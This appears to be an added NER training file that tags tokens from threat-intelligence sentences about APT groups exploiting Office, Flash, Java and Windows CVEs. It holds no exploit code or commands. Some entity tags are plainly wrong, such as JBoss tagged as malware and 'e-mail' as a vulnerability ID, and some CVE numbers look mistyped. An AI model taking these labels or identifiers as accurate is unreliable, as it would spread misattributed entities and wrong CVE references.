+; O
+and O
+CVE-2010-0738 S-VULID
+, O
+a O
+vulnerability O
+in O
+JBoss S-MAL
+, O
+to O
+compromise O
+internally O
+and O
+externally O
+accessible O
+assets O
+used O
+to O
+redirect O
+users' O
+web O
+browsers O
+to O
+exploit S-VULNAME
+code O
+. O
+
+In O
+particular O
+, O
+the O
+threat O
+actors O
+have O
+exploited O
+CVE-2011-3544 S-VULID
+, O
+a O
+vulnerability O
+in O
+the O
+Java O
+Runtime O
+Environment O
+, O
+to O
+deliver O
+the O
+HTTPBrowser B-MAL
+backdoor E-MAL
+; O
+and O
+CVE-2010-0738 S-VULID
+, O
+a O
+vulnerability O
+in O
+JBoss S-MAL
+, O
+to O
+compromise O
+internally O
+and O
+externally O
+accessible O
+assets O
+used O
+to O
+redirect O
+users' O
+web O
+browsers O
+to O
+exploit S-VULNAME
+code O
+. O
+
+TG-3390 O
+'s O
+activities S-ACT
+indicate O
+a O
+preference O
+for O
+leveraging B-ACT
+SWCs E-ACT
+and O
+scan-and-exploit B-ACT
+techniques E-ACT
+to O
+compromise O
+target O
+systems O
+. O
+
+Even O
+when O
+we O
+observed O
+LuckyMouse O
+using O
+weaponized O
+documents O
+with O
+CVE-2017-11882 S-VULID
+( O
+Microsoft B-MAL
+Office I-MAL
+Equation I-MAL
+Editor E-MAL
+, O
+widely O
+used O
+by O
+Chinese-speaking O
+actors O
+since O
+December B-TIME
+2017 E-TIME
+) O
+, O
+we O
+can′t O
+prove O
+they O
+were O
+related O
+to O
+this O
+particular O
+attack O
+. O
+
+LuckyMouse O
+has O
+been O
+spotted O
+using O
+a O
+widely O
+used O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+( O
+CVE-2017-11882 S-VULID
+) O
+. O
+
+No O
+zero-day S-VULNAME
+vulnerabilities O
+were O
+used O
+to O
+breach O
+targeted O
+networks O
+, O
+instead O
+" O
+TG-3390 O
+relied O
+on O
+old O
+vulnerabilities O
+such O
+as O
+CVE-2011-3544 S-VULID
+" O
+— O
+a O
+near-year-old O
+Java O
+security O
+hole O
+— O
+" O
+and O
+CVE-2010-0738 S-VULID
+to O
+compromise O
+their O
+targets O
+" O
+, O
+Dell B-SECTEAM
+SecureWorks' E-SECTEAM
+researchers O
+reported O
+. O
+
+Execute O
+a O
+command O
+through O
+exploits O
+for O
+CVE-2017-11882 S-VULID
+. O
+
+Execute O
+a O
+command O
+through O
+exploits O
+for O
+CVE-2018-0802 S-VULID
+. O
+
+The O
+document O
+attached O
+to O
+this O
+e-mail B-VULID
+exploits S-VULNAME
+CVE-2012-0158 S-VULID
+. O
+
+Tropic B-APT
+Trooper E-APT
+is O
+also O
+still O
+exploiting O
+CVE-2012-0158 S-VULID
+, O
+as O
+are O
+many O
+threat O
+actors O
+. O
+
+The O
+documents S-FILE
+attached O
+to O
+spear-phishing S-ACT
+e-mails E-ACT
+used O
+in O
+both O
+attacks O
+contain O
+code O
+that O
+exploits O
+CVE-2012-0158 S-VULID
+, O
+which O
+despite O
+its O
+age O
+remains O
+one O
+of O
+the O
+most O
+common O
+Microsoft B-TOOL
+Word E-TOOL
+vulnerabilities S-VULNAME
+being O
+exploited O
+by O
+multiple O
+threat O
+actors O
+. O
+
+the O
+backdoor O
+is O
+packaged O
+together O
+with O
+the O
+CVE-2013-5065 S-VULID
+EoP S-TOOL
+exploit S-VULNAME
+and O
+heavily O
+obfuscated O
+. O
+
+While O
+we O
+were O
+unable O
+to O
+recover O
+the O
+initial O
+vulnerability O
+used O
+, O
+it O
+is O
+possibly O
+the O
+same O
+CVE-2014-0515 S-VULID
+Adobe B-TOOL
+Flash E-TOOL
+exploit S-VULNAME
+first O
+reported O
+by O
+Cisco B-SECTEAM
+TRAC E-SECTEAM
+in O
+late B-TIME
+July E-TIME
+. O
+
+However O
+, O
+to O
+increase O
+success O
+rates O
+APT20 S-APT
+can O
+use O
+zero-day S-VULNAME
+exploits O
+, O
+so O
+even O
+a O
+properly O
+patched O
+system O
+would O
+be O
+compromised O
+. O
+
+PLEAD S-ACT
+also O
+dabbled O
+with O
+a O
+short-lived O
+, O
+fileless O
+version O
+of O
+their O
+malware O
+when O
+it O
+obtained O
+an O
+exploit S-VULNAME
+for O
+a O
+Flash S-TOOL
+vulnerability O
+( O
+CVE-2015-5119 S-VULID
+) O
+that O
+was O
+leaked O
+during O
+the O
+Hacking O
+Team O
+breach O
+. O
+
+PLEAD S-ACT
+also O
+uses O
+CVE-2017-7269 S-VULID
+, O
+a O
+buffer O
+overflow O
+vulnerability O
+Microsoft S-IDTY
+Internet B-TOOL
+Information I-TOOL
+Services E-TOOL
+( O
+IIS S-TOOL
+) O
+6.0 O
+to O
+compromise O
+the O
+victim O
+'s O
+server O
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+has O
+detected O
+a O
+new O
+method O
+of O
+first O
+infection O
+that O
+uses O
+a O
+drive-by-download O
+with O
+a O
+flash S-TOOL
+exploit S-VULNAME
+( O
+CVE-2015-5119 S-VULID
+, O
+the O
+one O
+leaked O
+from O
+The O
+Hacking O
+Team O
+incident O
+) O
+. O
+
+If O
+the O
+document O
+was O
+delivered O
+with O
+macros O
+instead O
+of O
+exploits O
+( O
+CVE-2012-0158 S-VULID
+, O
+CVE-2013-3906 S-VULID
+or O
+CVE-2014-1761 S-VULID
+) O
+, O
+then O
+the O
+document O
+contained O
+instructions O
+for O
+enabling O
+macros O
+. O
+
+Moreover O
+, O
+they O
+used O
+the O
+same O
+exploit S-VULNAME
+kit B-VULNAME
+Niteris E-VULNAME
+as O
+that O
+in O
+the O
+Corkow S-MAL
+case O
+. O
+
+The O
+CVE-2012-0773 S-VULID
+was O
+originally O
+discovered O
+by O
+VUPEN O
+and O
+has O
+an O
+interesting O
+story O
+. O
+
+The O
+decoy B-MAL
+documents E-MAL
+used O
+by O
+the O
+InPage S-TOOL
+exploits S-VULNAME
+suggest O
+that O
+the O
+targets O
+are O
+likely O
+to O
+be O
+politically S-IDTY
+or O
+militarily S-IDTY
+motivated O
+. O
+
+While O
+documents O
+designed O
+to O
+exploit S-VULNAME
+the O
+InPage B-MAL
+software E-MAL
+are O
+rare O
+, O
+they O
+are O
+not O
+new O
+– O
+however O
+in O
+recent O
+weeks O
+Unit42 S-SECTEAM
+has O
+observed O
+numerous O
+InPage S-TOOL
+exploits S-VULNAME
+leveraging O
+similar O
+shellcode O
+, O
+suggesting O
+continued O
+use O
+of O
+the O
+exploit S-VULNAME
+previously O
+discussed O
+by O
+Kaspersky S-SECTEAM
+. O
+
+Compared O
+to O
+Patchwork S-APT
+, O
+whose O
+Trojanized O
+documents O
+exploit S-VULNAME
+at O
+least O
+five O
+security O
+flaws O
+, O
+Confucius' O
+backdoors O
+are O
+delivered O
+through O
+Office O
+files O
+exploiting O
+memory O
+corruption O
+vulnerabilities O
+CVE-2015-1641 S-VULID
+and O
+CVE-2017-11882 S-VULID
+. O
+
+Lately O
+, O
+Patchwork S-APT
+has O
+been O
+sending O
+multiple O
+RTF B-FILE
+files E-FILE
+exploiting O
+CVE-2017-8570 S-VULID
+. O
+
+Confucius' B-MAL
+backdoors E-MAL
+are O
+delivered O
+through O
+Office O
+documents O
+exploiting O
+memory O
+corruption O
+vulnerabilities O
+CVE-2015-1641 S-VULID
+and O
+CVE-2017-11882 S-VULID
+. O
+
+The O
+sctrls B-MAL
+backdoor E-MAL
+we O
+came O
+across O
+is O
+delivered O
+via O
+RTF B-ACT
+files E-ACT
+exploiting O
+CVE-2015-1641 S-VULID
+. O
+
+The O
+documents O
+that O
+exploit S-VULNAME
+CVE-2017-11882 S-VULID
+download O
+another O
+payload O
+— O
+an O
+HTML B-TOOL
+Application E-TOOL
+( O
+HTA S-TOOL
+) O
+file O
+toting O
+a O
+malicious O
+Visual B-TOOL
+Basic E-TOOL
+( O
+VBS S-TOOL
+) O
+script O
+— O
+from O
+the O
+server O
+, O
+which O
+is O
+executed O
+accordingly O
+by O
+the O
+command-line O
+tool O
+mshta.exe S-FILE
+. O
+
+Hackers O
+use O
+the O
+exploits O
+" O
+Nitris B-VULNAME
+Exploit I-VULNAME
+Kit E-VULNAME
+" O
+( O
+earlier O
+known O
+as O
+CottonCastle S-VULNAME
+) O
+, O
+which O
+is O
+not O
+available O
+in O
+open O
+sources O
+and O
+sold O
+only O
+to O
+trusted O
+users O
+. O
+
+Hackers O
+first O
+actively O
+spread O
+bots O
+using O
+the O
+Niteris S-TOOL
+exploit S-VULNAME
+, O
+and O
+then O
+search O
+for O
+infected O
+devices O
+at O
+banks S-IDTY
+amongst O
+their O
+bots O
+by O
+analyzing O
+IP S-PROT
+addresses O
+, O
+cracked O
+passwords O
+and O
+results O
+of O
+the O
+modules O
+performance O
+. O
+
+In O
+August B-TIME
+2014 E-TIME
+, O
+some O
+of O
+our O
+users O
+observed O
+targeted B-ACT
+attacks E-ACT
+with O
+a O
+variation O
+of O
+CVE-2012-0158 S-VULID
+and O
+an O
+unusual O
+set O
+of O
+malware O
+. O
+
+Longhorn O
+, O
+which O
+we O
+internally O
+refer O
+to O
+as O
+" O
+The B-APT
+Lamberts E-APT
+" O
+, O
+first O
+came O
+to O
+the O
+attention O
+of O
+the O
+ITSec B-SECTEAM
+community E-SECTEAM
+in O
+2014 S-TIME
+, O
+when O
+our O
+colleagues O
+from O
+FireEye S-SECTEAM
+discovered O
+an O
+attack O
+using O
+a O
+zero B-VULNAME
+day E-VULNAME
+vulnerability S-VULNAME
+( O
+CVE-2014-4148 S-VULID
+) O
+. O
+
+The O
+first O
+time O
+the O
+Lambert B-MAL
+family I-MAL
+malware E-MAL
+was O
+uncovered O
+publicly O
+was O
+in O
+October B-TIME
+2014 E-TIME
+, O
+when O
+FireEye S-SECTEAM
+posted O
+a O
+blog O
+about O
+a O
+zero B-VULNAME
+day E-VULNAME
+exploit S-VULNAME
+( O
+CVE-2014-4148 S-VULID
+) O
+used O
+in O
+the O
+wild O
+. O
+
+While O
+in O
+most O
+cases O
+the O
+infection O
+vector O
+remains O
+unknown O
+, O
+the O
+high B-ACT
+profile I-ACT
+attack E-ACT
+from O
+2014 S-TIME
+used O
+a O
+very O
+complex O
+Windows S-OS
+TTF O
+zero-day S-VULNAME
+exploit S-VULNAME
+( O
+CVE-2014-4148 S-VULID
+) O
+. O
+
+To O
+further O
+exemplify O
+the O
+proficiency O
+of O
+the O
+attackers O
+leveraging O
+the O
+Lamberts B-MAL
+toolkit E-MAL
+, O
+deployment O
+of O
+Black B-MAL
+Lambert E-MAL
+included O
+a O
+rather O
+sophisticated O
+TTF O
+zero B-VULNAME
+day E-VULNAME
+exploit S-VULNAME
+, O
+CVE-2014-4148 S-VULID
+. O
+
+This O
+sample O
+was O
+also O
+found O
+to O
+be O
+deployed O
+using O
+the O
+CVE-2012-0158 S-VULID
+vulnerability O
+. O
+
+Our O
+analysis O
+shows O
+that O
+actors O
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+'s O
+analysis O
+shows O
+that O
+NetTraveler S-MAL
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+Our O
+analysis O
+shows O
+that O
+NetTraveler S-MAL
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+In O
+this O
+report O
+, O
+we'll O
+review O
+how O
+the O
+actors O
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+the O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+In O
+this O
+report O
+, O
+we'll O
+review O
+how O
+NetTraveler S-MAL
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+the O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+In O
+this O
+report O
+, O
+we'll O
+review O
+how O
+the O
+NetTraveler S-MAL
+attempted O
+to O
+exploit S-VULNAME
+CVE-2012-0158 S-VULID
+to O
+install O
+the O
+NetTraveler B-MAL
+Trojan E-MAL
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+products O
+detect O
+the O
+Microsoft B-IDTY
+Office E-IDTY
+exploits S-VULNAME
+used O
+in O
+the O
+spear-phishing S-ACT
+attacks E-ACT
+, O
+including O
+Exploit.MSWord.CVE-2010-333 S-FILE
+, O
+Exploit.Win32.CVE-2012-0158 S-FILE
+. O
+
+The O
+files S-FILE
+exploit S-VULNAME
+the O
+well-known O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+, O
+CVE-2012-0158 S-VULID
+, O
+to O
+execute O
+malicious O
+code O
+in O
+order O
+to O
+take O
+control O
+of O
+the O
+targeted O
+systems O
+. O
+
+Earlier O
+this O
+month O
+, O
+Securelist S-SECTEAM
+'s O
+technology O
+caught O
+another O
+zero-day S-VULNAME
+exploits O
+deployed O
+in O
+targeted B-ACT
+attacks E-ACT
+. O
+
+Operation B-ACT
+Daybreak E-ACT
+appears O
+to O
+have O
+been O
+launched O
+by O
+ScarCruft O
+in O
+March B-TIME
+2016 E-TIME
+and O
+employs O
+a O
+previously O
+unknown O
+( O
+0-day S-VULNAME
+) O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+exploit S-VULNAME
+. O
+
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+exploit S-VULNAME
+. O
+
+It O
+is O
+also O
+possible O
+that O
+ScarCruft S-APT
+deployed O
+another O
+zero B-VULNAME
+day E-VULNAME
+exploit S-VULNAME
+, O
+CVE-2016-0147 S-VULID
+, O
+which O
+was O
+patched O
+in O
+April O
+. O
+
+Operation B-ACT
+Erebus E-ACT
+leverages O
+another O
+Flash B-TOOL
+Player E-TOOL
+exploit S-VULNAME
+( O
+CVE-2016-4117 S-VULID
+) O
+through O
+the O
+use O
+of O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+. O
+
+ScarCruft S-APT
+'s O
+Operation B-ACT
+Erebus E-ACT
+leverages O
+another O
+Flash B-TOOL
+Player E-TOOL
+exploit S-VULNAME
+( O
+CVE-2016-4117 S-VULID
+) O
+through O
+the O
+use O
+of O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+. O
+
+Nevertheless O
+, O
+resourceful O
+threat O
+actors O
+such O
+as O
+ScarCruft S-APT
+will O
+probably O
+continue O
+to O
+deploy O
+zero-day S-VULNAME
+exploits O
+against O
+their O
+high O
+profile O
+targets O
+. O
+
+This O
+malware O
+uses O
+the O
+public O
+privilege O
+escalation O
+exploit S-VULNAME
+code O
+CVE-2018-8120 S-VULID
+or O
+UACME S-MAL
+which O
+is O
+normally O
+used O
+by O
+legitimate O
+red O
+teams O
+. O
+
+Earlier O
+this O
+month O
+, O
+we O
+caught O
+another O
+zero-day S-VULNAME
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+exploits O
+deployed O
+in O
+targeted B-ACT
+attacks E-ACT
+. O
+
+The O
+other O
+one O
+, O
+ScarCruft O
+'s O
+Operation B-ACT
+Erebus E-ACT
+employs O
+an O
+older O
+exploit S-VULNAME
+, O
+for O
+CVE-2016-4117 S-VULID
+and O
+leverages O
+watering B-ACT
+holes E-ACT
+. O
+
+The O
+other O
+one O
+, O
+" O
+Operation B-ACT
+Erebus E-ACT
+" O
+employs O
+an O
+older O
+exploit S-VULNAME
+, O
+for O
+CVE-2016-4117 S-VULID
+and O
+leverages O
+watering B-ACT
+holes E-ACT
+. O
+
+The O
+ScarCruft O
+APT O
+gang O
+has O
+made O
+use O
+of O
+a O
+Flash S-TOOL
+zero B-VULNAME
+day E-VULNAME
+patched O
+Thursday O
+by O
+Adobe O
+to O
+attack O
+more O
+than O
+two O
+dozen O
+high-profile O
+targets O
+in O
+Russia S-LOC
+and O
+Asia S-LOC
+primarily O
+. O
+
+Adobe O
+on O
+Thursday O
+patched O
+a O
+zero-day S-VULNAME
+vulnerability O
+in O
+Flash S-TOOL
+Player O
+that O
+has O
+been O
+used O
+in O
+targeted B-ACT
+attacks E-ACT
+carried O
+out O
+by O
+a O
+new O
+APT O
+group O
+operating O
+primarily O
+against O
+high-profile O
+victims O
+in O
+Russia S-LOC
+and O
+Asia S-LOC
+. O
+
+Researchers O
+at O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+privately O
+disclosed O
+the O
+flaw O
+to O
+Adobe O
+after O
+exploits O
+against O
+the O
+zero-day S-VULNAME
+were O
+used O
+in O
+March S-TIME
+by O
+the O
+ScarCruft O
+APT O
+gang O
+in O
+what O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+is O
+calling O
+Operation B-ACT
+Daybreak E-ACT
+. O
+
+Kaspersky S-SECTEAM
+speculates O
+that O
+ScarCruft S-APT
+could O
+also O
+be O
+behind O
+another O
+zero-day S-VULNAME
+, O
+CVE-2016-0147 S-VULID
+, O
+a O
+vulnerability O
+in O
+Microsoft S-IDTY
+XML S-TOOL
+Core O
+Services O
+that O
+was O
+patched O
+in O
+April S-TIME
+. O
+
+Another O
+set O
+of O
+attacks O
+called O
+Operation B-ACT
+Erebus E-ACT
+leverages O
+another O
+flash S-TOOL
+exploit S-VULNAME
+, O
+CVE-2016-4117 S-VULID
+, O
+and O
+relies O
+on O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+as O
+a O
+means O
+of O
+propagation O
+. O
+
+Thursday O
+'s O
+Flash S-TOOL
+Player O
+update O
+patched O
+36 O
+vulnerabilities O
+in O
+total O
+including O
+the O
+zero B-VULNAME
+day E-VULNAME
+CVE-2016-4171 S-VULID
+. O
+
+Wild B-APT
+Neutron E-APT
+'s O
+attacks O
+in O
+2015 S-TIME
+uses O
+a O
+stolen B-MAL
+code I-MAL
+signing I-MAL
+certificate E-MAL
+belonging O
+to O
+Taiwanese S-LOC
+electronics S-IDTY
+maker O
+Acer O
+and O
+an O
+unknown O
+Flash B-TOOL
+Player E-TOOL
+exploit S-VULNAME
+. O
+
+Wild B-APT
+Neutron E-APT
+'s O
+attack O
+took O
+advantage O
+of O
+a O
+Java S-TOOL
+zero-day S-VULNAME
+exploit S-VULNAME
+and O
+used O
+hacked O
+forums O
+as O
+watering B-ACT
+holes E-ACT
+. O
+
+Instead O
+of O
+Flash S-TOOL
+exploits S-VULNAME
+, O
+older O
+Wild O
+Neutron O
+exploitation O
+and O
+watering B-ACT
+holes E-ACT
+used O
+what O
+was O
+a O
+Java S-TOOL
+zero-day S-VULNAME
+at O
+the O
+end B-TIME
+of I-TIME
+2012 E-TIME
+and O
+the O
+beginning B-TIME
+of I-TIME
+2013 E-TIME
+, O
+detected O
+by O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+products O
+as O
+Exploit.Java.CVE-2012-3213.b S-VULID
+. O
+
+In O
+that O
+case O
+, O
+we O
+observed O
+Buhtrap S-APT
+using O
+a O
+local O
+privilege O
+escalation O
+exploit S-VULNAME
+, O
+CVE-2019-1132 S-VULID
+, O
+against O
+one O
+of O
+its O
+victims O
+. O
+
+Prior O
+to O
+that O
+report O
+, O
+we O
+published O
+detail O
+analysis O
+on O
+malware O
+exploiting O
+CVE-2018-8414 S-VULID
+vulnerability O
+(remote O
+code O
+execution O
+in O
+SettingContent-ms) O
+, O
+which O
+is O
+believed O
+a O
+work O
+of O
+DarkHydrus S-APT
+. O
+
+WannaCry S-ACT
+incorporated O
+the O
+leaked O
+EternalBlue S-VULNAME
+exploit S-VULNAME
+that O
+used O
+two O
+known O
+vulnerabilities O
+in O
+Windows S-OS
+CVE-2017-0144 S-VULID
+and O
+CVE-2017-0145 S-VULID
+to O
+turn O
+the O
+ransomware O
+into O
+a O
+worm O
+, O
+capable O
+of O
+spreading O
+itself O
+to O
+any O
+unpatched O
+computers O
+on O
+the O
+victim's O
+network O
+and O
+also O
+to O
+other O
+vulnerable O
+computers O
+connected O
+to O
+the O
+internet O
+. O
+
+One O
+vulnerability O
+is O
+a O
+Windows S-OS
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2019-0703 S-VULID
+) O
+discovered O
+by O
+Symantec S-SECTEAM
+. O
+Bemstour S-APT
+exploits O
+two O
+Windows S-OS
+vulnerabilities S-VULNAME
+in O
+order O
+to O
+achieve O
+remote O
+kernel O
+code O
+execution O
+on O
+targeted O
+computers O
+. O
+
+The O
+second O
+Windows S-OS
+vulnerability O
+( O
+CVE-2017-0143 O
+) O
+was O
+patched O
+in O
+March B-TIME
+2017 E-TIME
+after O
+it O
+was O
+discovered O
+to O
+have O
+been O
+used O
+by O
+two O
+exploit S-VULNAME
+tools—EternalRomance O
+and O
+EternalSynergy—that O
+were O
+also O
+released O
+as O
+part O
+of O
+the O
+Shadow B-APT
+Brokers E-APT
+leak O
+. O
+
+These O
+include O
+CVE-2010-3962 S-VULID
+as O
+part O
+of O
+an O
+attack B-ACT
+campaign E-ACT
+in O
+2010 S-TIME
+and O
+CVE-2014-1776 S-VULID
+in O
+2014 S-TIME
+. O
+Beginning O
+in O
+August B-TIME
+2016 E-TIME
+, O
+a O
+group O
+calling O
+itself O
+the O
+Shadow B-APT
+Brokers E-APT
+began O
+releasing O
+tools O
+it O
+claimed O
+to O
+have O
+originated O
+from O
+the O
+Equation S-APT
+Group O
+. O
+
+The O
+zero-day S-VULNAME
+vulnerability O
+found O
+and O
+reported O
+by O
+Symantec S-SECTEAM
+CVE-2019-0703 S-VULID
+occurs O
+due O
+to O
+the O
+ACT O
+the O
+Windows S-OS
+SMB O
+Server O
+handles O
+certain O
+requests O
+. O
+
+CVE-2017-0143 S-VULID
+was O
+also O
+used O
+by O
+two O
+other O
+exploit S-VULNAME
+tools—EternalRomance S-FILE
+and O
+EternalSynergy—that S-FILE
+were O
+released O
+as O
+part O
+of O
+the O
+Shadow O
+Brokers O
+leak O
+in O
+April B-TIME
+2017 E-TIME
+. O
+
+this O
+RTF S-TOOL
+exploits O
+again O
+the O
+CVE-2017-1882 S-VULID
+on O
+eqnedt32.exe S-FILE
+. O
+
+At O
+this O
+time O
+, O
+we O
+do O
+not O
+believe O
+that O
+the O
+attackers S-APT
+found O
+a O
+new O
+ASA S-TOOL
+exploit S-VULNAME
+. O
+
+We O
+believe O
+the O
+groups S-APT
+moved O
+to O
+use O
+CVE-2018-0798 S-VULID
+instead O
+of O
+the O
+other O
+Microsoft S-IDTY
+Equation B-TOOL
+Editor I-TOOL
+Remote I-TOOL
+Code I-TOOL
+Execution E-TOOL
+( O
+RCE S-TOOL
+) O
+vulnerabilities O
+because O
+the O
+former O
+is O
+more O
+reliable O
+as O
+it O
+works O
+on O
+all O
+known O
+versions O
+of O
+Equation O
+Editor O
+. O
+
+The O
+analyzed O
+RTF O
+files O
+share O
+the O
+same O
+object O
+dimension O
+(objw2180\objh300) O
+used O
+to O
+track O
+the O
+RTF O
+weaponizer O
+in O
+our O
+previous O
+report O
+, O
+however O
+, O
+the O
+sample S-FILE
+was O
+not O
+exploiting O
+CVE-2017-11882 S-VULID
+or O
+CVE-2018-0802 S-VULID
+. O
+
+After O
+further O
+analysis O
+, O
+it O
+was O
+discovered O
+that O
+the O
+RTF B-FILE
+files E-FILE
+were O
+exploiting O
+the O
+CVE-2018-0798 S-VULID
+vulnerability O
+in O
+Microsoft S-IDTY
+’s O
+Equation B-TOOL
+Editor E-TOOL
+( O
+EQNEDT32 S-TOOL
+) O
+. O
+
+Anomali S-SECTEAM
+Researchers O
+were O
+able O
+to O
+identify O
+multiple O
+samples O
+of O
+malicious O
+RTF O
+documents O
+ITW S-FILE
+using O
+the O
+same O
+exploit S-VULNAME
+for O
+CVE-2018-0798 S-VULID
+. O
+
+CVE-2018-0798 S-VULID
+is O
+an O
+RCE O
+vulnerability O
+, O
+a O
+stack O
+buffer O
+overflow O
+that O
+can O
+be O
+exploited O
+by O
+a O
+threat O
+actor O
+to O
+perform O
+stack O
+corruption O
+. O
+
+As O
+observed O
+previously O
+with O
+CVE-2017-11882 S-VULID
+and O
+CVE-2018-0802 S-VULID
+, O
+the O
+weaponizer S-MAL
+was O
+used O
+exclusively O
+by O
+Chinese O
+Cyber B-ACT
+Espionage E-ACT
+actors S-APT
+for O
+approximately O
+one O
+year O
+December B-TIME
+2017 E-TIME
+through O
+December B-TIME
+2018 E-TIME
+, O
+after O
+which O
+cybercrime O
+actors O
+began O
+to O
+incorporate O
+it O
+in O
+their O
+malicious O
+activity O
+. O
+
+Analysis O
+of O
+the O
+Royal O
+Road O
+weaponizer O
+has O
+resulted O
+in O
+the O
+discovery O
+that O
+multiple O
+Chinese O
+threat B-APT
+groups E-APT
+started O
+utilizing O
+CVE-2018-0798 S-VULID
+in O
+their O
+RTF B-MAL
+weaponizer E-MAL
+. O
+
+These O
+findings O
+also O
+suggest O
+that O
+the O
+threat B-APT
+groups E-APT
+have O
+robust O
+exploit S-VULNAME
+developing O
+capabilities O
+because O
+CVE-2018-0798 S-VULID
+is O
+not O
+widely O
+reported O
+on O
+and O
+it O
+is O
+typically O
+not O
+incorporated O
+into O
+publicly O
+available O
+weaponizers O
+. O
+
+Upon O
+opening O
+of O
+the O
+MS O
+Word S-TOOL
+document O
+, O
+our O
+embedded O
+file O
+exploits O
+CVE-2017-11882 S-VULID
+to O
+drop O
+a O
+malicious O
+fake O
+Norton O
+Security O
+Shell O
+Extension O
+module O
+, O
+'NavShExt.dll' S-FILE
+, O
+which O
+is O
+then O
+injected O
+into O
+iexplore.exe S-FILE
+to O
+install O
+the O
+backdoor O
+, O
+begin O
+collection O
+, O
+and O
+activate O
+command O
+and O
+control O
+. O
+
+Moving O
+through O
+the O
+infection O
+process O
+, O
+NetWitness O
+Endpoint O
+detects O
+the O
+initial O
+exploit S-VULNAME
+CVE-2017-1182 S-VULID
+in O
+action O
+as O
+the O
+Microsoft B-FILE
+Equation I-FILE
+Editor E-FILE
+, O
+'EQNEDT32.exe' S-FILE
+, O
+scores O
+high O
+for O
+potentially O
+malicious O
+activity O
+. O
+
+Attackers S-APT
+relied O
+on O
+Microsoft S-IDTY
+Equation O
+Editor O
+exploit S-VULNAME
+CVE-2018-0798 S-VULID
+to O
+deliver O
+a O
+custom O
+malware O
+that O
+Proofpoint O
+researchers O
+have O
+dubbed O
+Cotx O
+RAT. O
+Maudi S-APT
+Surveillance O
+Operation O
+which O
+was O
+previously O
+reported O
+in O
+2013 S-TIME
+. O
+
+specifically O
+CVE-2018-0798 S-VULID
+, O
+before O
+downloading O
+subsequent O
+payloads O
+. O
+
+Dubbed O
+‘Operation B-APT
+Sheep’ E-APT
+, O
+this O
+massive O
+data O
+stealing O
+campaign O
+is O
+the O
+first O
+known O
+campaign O
+seen O
+in O
+the O
+wild O
+to O
+exploit S-VULNAME
+the O
+Man-in-the-Disk S-VULNAME
+vulnerability O
+revealed O
+by O
+Check O
+Point O
+Research O
+earlier O
+last O
+year O
+. O
+
+Notably O
+, O
+APT41 S-APT
+was O
+observed O
+using B-ACT
+proof-of-concept E-ACT
+exploit S-VULNAME
+code O
+for O
+CVE-2019-3396 S-VULID
+within O
+23 O
+days O
+after O
+the O
+Confluence O
+. O
+
+We’ve O
+discovered O
+a O
+new O
+version O
+of O
+BalkanDoor S-APT
+with O
+a O
+new O
+method O
+for O
+execution/installation: O
+an O
+exploit S-VULNAME
+of O
+the O
+WinRAR S-TOOL
+ACE O
+vulnerability O
+CVE-2018-20250 S-VULID
+. O
+
+In O
+some O
+of O
+the O
+latest O
+samples O
+of O
+BalkanDoor S-FILE
+detected O
+in O
+2019 S-TIME
+, O
+the O
+malware O
+is O
+distributed O
+as O
+an O
+ACE O
+archive O
+, O
+disguised O
+as O
+a O
+RAR O
+archive O
+(i.e. O
+, O
+not O
+an O
+executable O
+file) O
+, O
+specially O
+crafted O
+to O
+exploit S-VULNAME
+the O
+WinRAR S-TOOL
+ACE O
+vulnerability O
+CVE-2018-20250 S-VULID
+. O
+
+The O
+actor S-APT
+attempts O
+to O
+exploit S-VULNAME
+CVE-2018–8440 S-VULID
+— O
+an O
+elevation O
+of O
+privilege O
+vulnerability S-VULNAME
+in O
+Windows S-OS
+when O
+it O
+improperly O
+handles O
+calls O
+to O
+Advanced O
+Local O
+Procedure O
+Call O
+— O
+to O
+elevate O
+the O
+privileges O
+using O
+a O
+modified O
+proof-of-concept S-VULNAME
+exploit S-VULNAME
+. O
+
+The O
+China B-FILE
+Chopper E-FILE
+actor O
+activity O
+starts O
+with O
+the O
+download O
+and O
+execution O
+of O
+two O
+exploit S-VULNAME
+files O
+which O
+attempt O
+to O
+exploit S-VULNAME
+the O
+Windows S-OS
+vulnerabilities O
+CVE-2015-0062 S-VULID
+, O
+CVE-2015-1701 S-VULID
+and O
+CVE-2016-0099 S-VULID
+to O
+allow O
+the O
+attacker S-APT
+to O
+modify O
+other O
+objects O
+on O
+the O
+server O
+. O
+
+Previously O
+, O
+Cloud B-APT
+Atlas E-APT
+dropped O
+its O
+validator” O
+implant O
+named O
+PowerShower” O
+directly O
+, O
+after O
+exploiting O
+the O
+Microsoft S-IDTY
+Equation O
+vulnerability O
+CVE-2017-11882 S-VULID
+mixed O
+with O
+CVE-2018-0802 S-VULID
+. O
+
+The O
+following O
+archive S-FILE
+caught O
+our O
+attention O
+for O
+exploiting O
+a O
+WinRAR S-TOOL
+unacev2 O
+module O
+vulnerability S-VULNAME
+and O
+for O
+having O
+interesting O
+content O
+. O
+
+Mimikatz S-FILE
+is O
+a O
+post-exploitation O
+tool O
+that O
+allows O
+attackers O
+to O
+extract O
+credentials O
+from O
+volatile O
+memory O
+. O
+
+Analysis O
+of O
+the O
+emails S-TOOL
+has O
